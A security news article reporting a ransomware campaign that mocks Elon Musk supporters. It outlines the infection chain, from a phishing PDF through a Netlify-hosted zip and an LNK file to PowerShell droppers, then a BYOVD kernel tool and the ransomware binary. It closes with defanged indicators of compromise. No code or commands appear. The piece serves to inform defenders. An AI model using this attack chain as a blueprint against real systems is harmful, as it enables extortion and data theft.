New Ransomware Campaign Mocks Elon Musk Supporters Deploys Payloads via PowerShell

A new ransomware campaign has emerged, targeting users through a sophisticated multi-stage infection chain while delivering satirical commentary aimed at Elon Musk supporters.

Security researchers have identified this wave of attacks as leveraging social engineering techniques and PowerShell-based payloads, embedding an unusual mix of technical skill, social parody, and financial motivation.

Parody and Political Satire Blend

The initial infection vector begins with a phishing PDF titled “Pay Adjustment,” designed to ensnare victims through a supposed compensation update.

When opened, the document links to a Zip file hosted on Netlify, a legitimate cloud platform often abused by threat actors for payload delivery.

This archive contains a shortcut (LNK) file, which, upon execution, triggers a PowerShell script (Pay.ps1) that acts as the first-stage dropper.

The chain continues with execution of stage1.ps1, a script responsible for orchestrating subsequent payloads and escalating the attack.

An in-depth technical analysis reveals the campaign’s modular architecture. The first-stage PowerShell script, stage1.ps1, operates as a loader and orchestrator, deploying a range of components.

Among these, “cwiper.exe” stands out as a ransomware binary exhibiting characteristics similar to the “Fog” ransomware family.

Its ransom note, named RANSOMNOTE.txt, not only demands payment in Monero but also parodies the cryptocurrency community.

The note impersonates “Edward Coristine” of DOGE and bizarrely lists U.S. government email addresses as support contacts, underlining the campaign’s satirical underpinnings.

Technical Sophistication in New Attack

Further enhancing the attack’s sophistication, the campaign includes “ktool.exe,” which leverages the Bring Your Own Vulnerable Driver (BYOVD) technique, granting the adversaries kernel-level access to the target system.

The attackers utilize “trackerjacker.ps1,” an XOR-obfuscated script, to maintain stealth and avoid detection.

Meanwhile, “lootsubmit.ps1” performs reconnaissance and geolocation using the Wigle Wi-Fi geolocation API, helping the operators profile infected systems more effectively.

Interestingly, as the ransomware executes, it launches a YouTube video mocking Elon Musk-likely serving as both a distraction and a reinforcement of the campaign’s parodic messaging.

This combination of technical execution and deliberate mockery points to a hybrid motivation: blending cybercriminal financial incentive with trolling and political commentary.

Despite the apparent satire, the presence of a Monero wallet in the ransom note confirms that profit remains a primary motive.

The campaign’s use of cloud-hosted infrastructure, multi-stage PowerShell attack chains, and BYOVD techniques highlights both a high level of technical proficiency and an evolving threat landscape where social and political narratives are weaponized alongside malware.

Researchers urge organizations to be wary of unsolicited emails containing PDF attachments and to monitor for suspicious PowerShell activity, especially when linked to cloud-hosted payloads.

Indicators of Compromise (IOCs)

Type	Value
Domain	hilarious-trifle-d9182e[.]netlify[.]app
PDF SHA256	6eb8b5986ea95877146adc1c6ed48ca2c304d23bc8a4a904b6e6d22d55bceec3
cwiper.exe	ecfed78315f942fe0e6762acd73ef7f30c34620615ef5e71f899e1d069dabd9e
ktool.exe	335411c83e1419c7a9074c1fe0775244e020ccebad76582d12898a3f8c2778a0
trackerjacker.ps1	82137b80c2d59095e18330b1793c38b4358ae3b9f8ef2ff96656637cd2d0c891
lootsubmit.ps1	0100a169f6b2008f7884b7685f9b71e68fe62de13be045dfabe6dc699a7f1f4d

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates

The post New Ransomware Campaign Mocks Elon Musk Supporters Deploys Payloads via PowerShell appeared first on Cyber Security News.